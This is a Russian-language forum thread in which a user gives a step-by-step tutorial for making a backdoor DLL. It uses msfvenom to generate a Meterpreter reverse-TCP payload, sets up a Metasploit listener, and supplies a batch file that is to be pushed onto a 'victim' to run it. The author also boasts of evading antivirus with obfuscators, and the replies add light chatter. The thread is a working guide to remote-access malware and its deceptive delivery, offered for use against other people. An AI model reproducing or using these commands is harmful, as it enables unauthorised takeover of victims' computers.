Загрузка...

Backdoor в dll | Вирус в dll | Kali linux

Тема в разделе Kali Linux создана пользователем Sluxa22324 19 ноя 2020. 2871 просмотр

Загрузка...
  1. Sluxa22324
    Sluxa22324 Автор темы 19 ноя 2020 Заблокирован(а) 26 31 авг 2020
    Хочу показать как можно сделать вирус в dll.
    Вначале запускаем линукс.

    Запускаем metasploit
    Код
    msfconsole
    [IMG]

    Теперь будем создавать наш зловред

    Открываем новый терминал
    Код
    msfvenom --platform windows --arch x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.22 LPORT=4444 -f dll > 134.dll
    LHOST = ваш ip адрес
    LPORT = открытый порт
    У меня получилось вот так.
    [IMG]
    Всё. Бакдор готов.
    Дальше прописываем

    Код
    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp
    set LHOST xxxx
    set LPORT xxxx
    [IMG]
    Всё готово. прописываем run

    Дальше втираем жертве этот батник
    Код
    @echo off
    rundll32.exe 134.dll. main
    exit
    (Батник и длл ка должны лежать в одной папке)
    Хочу сказать, что если мы заинжектим в кс го длл через процесс хакер сессия тоже откроется и не нужно делать батники.

    Запускаем батник

    и мы получаем сессию meterpreter

    [IMG]

    Дальше можем делать с нашей жертвой абсолютно всё.
    [IMG]

    Вот эта тема будет висеть у вас в диспетчере задач. Если мы её убьем то сессия закроется.
    [IMG]

    Спасибо за внимание!!!
    Надеюсь статья вам помогла.

    #мояперваястатья








     
    19 ноя 2020 Изменено
  2. Sluxa22324
    Sluxa22324 Автор темы 19 ноя 2020 Заблокирован(а) 26 31 авг 2020
    Да детект большой. Но я сделал 2/36 без особых усилий, используя обычные обсфискаторы и протекторы
     
  3. noxrod
    Не надо, я уже 2 раза винду сносил(9(9(:despair:
     
    1. Sluxa22324 Автор темы
      noxrod, И сессия закроется [IMG]
  4. Sluxa22324
    Sluxa22324 Автор темы 19 ноя 2020 Заблокирован(а) 26 31 авг 2020
    noxrod, А причём здесь винда? в процессах [IMG] который без особых усилий мы можем кильнуть
     
    1. noxrod
      Sluxa22324, Да я майнер + вирус поймал. Хотел софт скачать.
    2. Sluxa22324 Автор темы
      noxrod, А бывает. Используй виртуалку.
  5. Sten0
    Sten0 19 ноя 2020 2 14 ноя 2020
    Заебато
     
  6. Sluxa22324
    Sluxa22324 Автор темы 19 ноя 2020 Заблокирован(а) 26 31 авг 2020
    Я могу показать как я это в глобалку вывел без открытых портов и ngrok. Пишите + если хотите статью
     
  7. al000al
    al000al 22 ноя 2020 0 8 ноя 2018
Top